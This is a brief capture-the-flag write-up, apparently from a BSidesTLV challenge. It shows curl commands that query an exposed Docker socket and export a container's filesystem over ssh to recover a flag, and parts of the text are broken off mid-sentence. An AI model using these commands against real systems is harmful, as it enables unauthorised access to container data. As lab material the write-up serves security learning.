By Yaakov Cohen


We connected to the server, and after poking around a bit we saw that they left docker.sock opened. Let's see what info we can get.

Running curl --unix-socket /var/run/docker.sock http/containers/json?all=1 gaves us a list of 4 containers. Only the first one was relevant:

    "Status":"Exited (0) 9 seconds ago",




Since the system was read-only we ran the next step from our command line:

ssh [email protected] -p 2222 "curl --unix-socket /var/run/docker.sock http:/v1.24/containers/7fbd7d717462b5510a0066a4e33884e6b73877e837379bf1c196679c7f504825/export" > galf.tar

The long number is the Id of the container we are trying to extract, galf is flag in reverse.

After the file finished downloading we extracted it and found a bash script named


ls -la /home/flag_is_here

In /home/flag_is_here we found flag.txt: BSidesTLV{i_am_r34dy_t0_esc4p3_th3_d0ck3r!}